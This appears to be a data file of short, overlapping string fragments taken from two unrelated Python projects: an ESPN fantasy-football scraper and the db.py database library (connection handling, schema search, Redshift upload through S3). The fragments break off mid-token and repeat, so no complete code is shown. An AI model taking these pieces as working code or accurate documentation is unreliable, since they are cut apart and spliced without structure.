child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page", "\"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\",", "rb, wr, te, k, etc. season_year: int 2017, 2016 week: int 1, 2,", "logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p", "\"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\",", "\"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\",", "\"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\"", "position Args: pos: str qb, rb, wr, te, k, etc. season_year: int 2017,", "soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank", "= list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] =", "[] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\",", "self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else:", "k, etc. season_year: int 2017, 2016 week: int 1, 2, 3 offset: int", "players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML string \"\"\"", "and uppercase Args: pos(str): Returns: str \"\"\" if pos in [ \"qb\", \"rb\",", "from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import", "re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper", "\"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\":" ]
[ "s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3. Parameters ---------- name: str", "= True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\"", "and rendered using handlebars. union: bool Whether or not \"UNION ALL\" handlebars templates.", "chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket)", "self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type", "HAS_ODBC = True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL =", "Please ensure it is installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key", "\"\"\" if isinstance(data_type, str): data_type = [data_type] cols = [] for table in", "name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise", "table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into", "dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if port is None: if", "argument is a prefix, so it'll pick up # all of the data*.gz", "} def find_table(self, search): \"\"\" Aggresively search through your database's schema for a", "load_from_json, dump_to_json from .query_templates import query_templates # attempt to import the relevant database", "for a column. Parameters ----------- search: str glob pattern for what you're looking", "table_meta = {} # pull out column metadata for all tables as list", "| | Album | ArtistId | INTEGER | | Artist | ArtistId |", "\"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\":", "Put The Finger On You 1 1 6 7 Let's Get It Up", "your shiny new table df: DataFrame data frame you want to save to", "import profile_path, load_profile, load_from_json, dump_to_json from .query_templates import query_templates # attempt to import", "raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as an environment variable", "self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f)", "INTEGER | | Track | TrackId | INTEGER | | Track | AlbumId", "Artist | Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120) |", "as list of tuples if told to use cached metadata if use_cache and", "prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns all tables prefixed w/", "self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def", "Customer | CustomerId | INTEGER | | Employee | EmployeeId | INTEGER |", "tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache):", "this is None, the function will try and grab AWS_ACCESS_KEY from your environment", "Parameters ----------- search: str glob pattern for what you're looking for data_type: str,", "str glob pattern for what you're looking for Examples ---------- >>> from db", "f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata'] =", "{{ . }} , ... {{/if}} ... {{/cols}} ... FROM ... Album; ...", "= self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con)", "drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\")", "in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for", "Employee | EmployeeId | INTEGER | | Genre | GenreId | INTEGER |", "the database credentials, plus the database properties to your db.py profile.\"\"\" if len(self.tables)", "pyodbc as pyo HAS_ODBC = True except ImportError: try: import pypyodbc as pyo", "= \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' )", "Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the", "... '{{ name }}' as table_name, ... COUNT(*) as cnt ... FROM ...", "= False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError:", "gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = []", "Address that are varchars +----------+----------------+--------------+ | Table | Column Name | Type |", "Whether or not \"UNION ALL\" handlebars templates. This will return any handlebars queries", "is installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key", "display in the foreign and reference keys. This is used to control the", "AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`\") conn =", "= Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', 'db.py') out", "credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename =", "| | Invoice | InvoiceId | INTEGER | | Invoice | CustomerId |", "| Invoice | CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70)", "| INTEGER | | Artist | ArtistId | INTEGER | | Customer |", ">>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -=", "table_name cnt 0 Album 347 1 Artist 275 2 Track 3503 >>> q", "lazy loaded reference to the table metadata for the DB.\"\"\" if len(self._tables) ==", "ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key query by doing", "the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name))", "it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table", "try: from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import Location", "profile from your config \"\"\" user = os.path.expanduser(\"~\") if s3: f = os.path.join(user,", "= port self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas =", "table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name", "os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise", "the DB.query method. You can override it by adding limit={X} to the `query`", "dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\",", "6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245", "all of the database profiles available Examples -------- No doctest, covered by unittest", "self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables", "redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available", "in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self,", "1 2 Balls to the Wall 2 2 3 Restless and Wild 2", "self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\")", "we're # lazily importing boto only if necessary here. if bucket_location is None:", "keys. This is used to control the rendering of PrettyTable a bit. None", "\"system\" tables (the ones that the database needs in order to operate). This", "\"UNION ALL\" handlebars templates. This will return any handlebars queries as a single", "| Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns", "# tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete()", "pyodbc or pymssql libraries. Please ensure one of them is installed\") if HAS_ODBC:", "list of tuples, to match how normal loading is performed for col in", "= True except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True", "installed\") creds = {} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if", "INTEGER | | Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId", "key relationships # 3. use the naive approach if use_cache: # generate our", "is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439 elif", "def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q = unicode(q)", "\\ 0 1 For Those About To Rock (We Salute You) 1 1", "Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\"", "hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except", "find for table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp", "11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521", "= pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\",", "{name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY,", "Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending", "varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row))", "Fast As a Shark 0.99 3 Restless and Wild 0.99 4 Princess of", "self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure", "sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down", "q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\",", "not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as credentials", "= value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not", "Restless and Wild 0.99 4 Princess of the Dawn 0.99 5 Put The", "one time, database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db',", "creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database", "to the Wall 0.99 2 Fast As a Shark 0.99 3 Restless and", "things like schema definitions. Most of you probably don't need this, but if", "temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert", "elif dbtype==\"mssql\": port = 1433 elif profile is not None: pass else: raise", "filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit = limit", "exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return", "collections import defaultdict import pandas as pd import pybars from .column import Column,", "sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. the s3 argument", "return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype", "Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About To Rock", "HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please ensure it is installed\")", "handlebars templates. This will return any handlebars queries as a single data frame.", "pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import sqlite3 as", "save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you don't have to save", "= self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of the database", "self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql", "you can use an S3 object print_sql: bool (False) option for printing sql", "name) try: try: open(f) except: raise Exception(\"Profile '{0}' does not exist. Could not", "ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC = True except", "wide columns in some cases. driver: str, None Driver for mssql/pyodbc connections. Examples", "| MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER | |", "name) # defaults to using SQLite format. need to convert it to Postgres", "import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db", "= getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\"", "from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For Those About", "{{/cols}} ... FROM ... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\",", "\".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying a database. Parameters ----------", "1 1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds", "Track 3503 >>> q = ''' ... SELECT ... {{#cols}} ... {{#if @last}}", "\"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql else:", "import StringIO # Python 2.7 except: from io import StringIO # Python 3.3+", "database from a file. Parameters ---------- filename: str A SQL script data: list,", "the `query` method, or by passing an argument to `DB()`. None indicates that", "query] if union==True: query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data,", "self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\": self.dbname, \"dbtype\": self.dbtype,", "0.99 9 8611245 0.99 >>> q = ''' ... SELECT ... a.Title, ...", "a single query for getting all key relationships # 3. use the naive", "in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified']", "MediaTypeId \\ 0 1 For Those About To Rock (We Salute You) 1", "will be passed to the template and rendered using handlebars. union: bool Whether", "will be no limit (That's right, you'll be limitless. Bradley Cooper style.) keys_per_column:", "them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'],", "u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user", "the database profiles available Examples -------- No doctest, covered by unittest list_profiles() {'demo':", "bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear", "| PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId | INTEGER", "# returns all columns containing Address that are varchars +----------+----------------+--------------+ | Table |", "node, so if running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY:", "from .column import Column, ColumnSet from .table import Table, TableSet from .s3 import", "select one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if", "pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username,", "if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column", "a prefix, so it'll pick up # all of the data*.gz files we've", "INTEGER | | Employee | EmployeeId | INTEGER | | Employee | Address", "table_name ... ''' >>> data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"},", "col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please wait...\") if self.schemas is not None", "= \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring and querying", "Column Name | Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) |", "2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>,", "db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") #", "to save to the db drop_if_exists: bool (False) whether you'd like to drop", "elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'): hostname", "This is not to say this a secure way to store sensitive data,", "self.hostname = hostname self.port = port self.filename = filename self.dbname = dbname self.dbtype", "| InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER", "for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list", "= self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\"", "in the same order, making doctest fail. db.find_column(\"Name\") # returns all columns named", "to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload", "\"\"\" Upload a dataframe to redshift via s3. Parameters ---------- name: str name", "Balls to the Wall 0.99 2 Fast As a Shark 0.99 3 Restless", "ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\":", "= os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile '{0}' does", "q # mssql else: if limit: q = \"select top {limit} * from", "-= if not, there's always a random issue where rows are not in", "= DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r 0 1", "an instance of DB that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/", "keys, you can use an S3 object print_sql: bool (False) option for printing", "About To Rock We Salute You 8 For Those About To Rock We", "arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] = value self.con =", "pull out column metadata for all tables as list of tuples if told", "io import StringIO # Python 3.3+ import uuid import re import os import", "= conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going", "# returns all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name |", "creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename')", "search through your database's schema for a column. Parameters ----------- search: str glob", "varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql", "from boto.s3.key import Key from boto.s3.connection import Location # if boto is present,", "| | Customer | CustomerId | INTEGER | | Employee | EmployeeId |", "| Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns", "if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not", "AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down", "and looks for any new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables,", "# TODO: maybe add warnings? try: import psycopg2 as pg HAS_PG = True", "| INTEGER | | Employee | ReportsTo | INTEGER | | Employee |", "self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library. Please ensure", "INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ | Table", "for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type", "union=False) AlbumId Title ArtistId 0 1 For Those About To Rock We Salute", "\"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. the s3 argument is a", "| +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp", "\"\"\" tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return", "1 1 2 Balls to the Wall 2 2 3 Restless and Wild", "port is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439", "\"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con", "and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please wait...\") for table in self._metadata_cache: # table", "the system tables. limit: int, None Default number of records to return in", "db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ |", "if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname", "# join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql", "f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0", "u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user =", "str Your username for the database password: str Your password for the database", "`DB()`. None indicates that there will be no limit (That's right, you'll be", "or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username", "print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None,", "| NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+", "| | MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId |", "Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns", "with any metatables (at least ones that fit into our framework), so we're", "tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self,", "find boto library. Please ensure it is installed\") if s3 is not None:", "| MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER | |", "---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") from db", "string to execute data: list, dict Optional argument for handlebars-queries. Data will be", "stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not", "key query by doing it one time, database-wide, if query is available elif", "sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as credentials plus tables dict", "Default number of keys to display in the foreign and reference keys. This", "Address +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ | Customer", "Dawn 0.99 5 Put The Finger On You 0.99 6 Let's Get It", "import StringIO # Python 3.3+ import uuid import re import os import sys", "template and rendered using handlebars. union: bool Whether or not \"UNION ALL\" handlebars", "... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q,", "= os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f =", "+ \"\\n\") self._try_command(sql) # generate schema from pandas and then adapt for redshift", "and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety key.", "def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and looks for", "None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database properties to", "self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print", "q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q =", "= {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False)", "NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | | Playlist | Name", "new table df: DataFrame data frame you want to save to the db", "bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library.", "f)) os.remove(f) except Exception as e: raise Exception(\"Could not remove profile {0}! Excpetion:", "schema for a column. Parameters ----------- search: str glob pattern for what you're", "# returns everything \"\"\" tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name,", "Those About To Rock (We Salute You) 1 1 1 2 Balls to", "to include \"system\" tables (the ones that the database needs in order to", "None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or as an environment", "one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache if dbtype", "properties to your db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile)", "string. Parameters ---------- q: str Query string to execute data: list, dict Optional", "return Examples -------- >>> from db import DemoDB >>> db = DemoDB() db.query(\"select", "3 4 Restless and Wild 3 2 4 5 Princess of the Dawn", "True except ImportError: try: import pypyodbc as pyo HAS_ODBC = True except ImportError:", "number of records to return in a query. This is used by the", "mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not", "command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False,", "permission on specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket:", "len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k =", "Wild 3 2 4 5 Princess of the Dawn 3 2 5 6", "name from sqlite_master where type='table';\")] for table in tables: for row in self.cur.execute(\"pragma", "of you probably don't need this, but if you're a db admin you", "+-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+ | Customer |", "table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and column names self.cur.execute(\"drop table", "17 -= Should sort in some way for all those doctests to be", "self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in", "self.username = username self.password = password self.hostname = hostname self.port = port self.filename", "rows are not in the same order, making doctest fail. db.find_column(\"Name\") # returns", "profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True", "Salute You 6 For Those About To Rock We Salute You 7 For", "statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS location in which", "import pybars from .column import Column, ColumnSet from .table import Table, TableSet from", "find psycopg2 library. Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname,", "\"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through your", "open(filename) as fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self):", "ImportError: raise Exception(\"Couldn't find boto library. Please ensure it is installed\") if s3", "return query def query(self, q, data=None, union=True, limit=None): \"\"\" Query your database with", "to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1", "| Milliseconds | INTEGER | | Track | GenreId | INTEGER | |", "*much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices per", "not None: pass else: raise Exception(\"Database type not specified! Must select one of:", "self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\") and username is 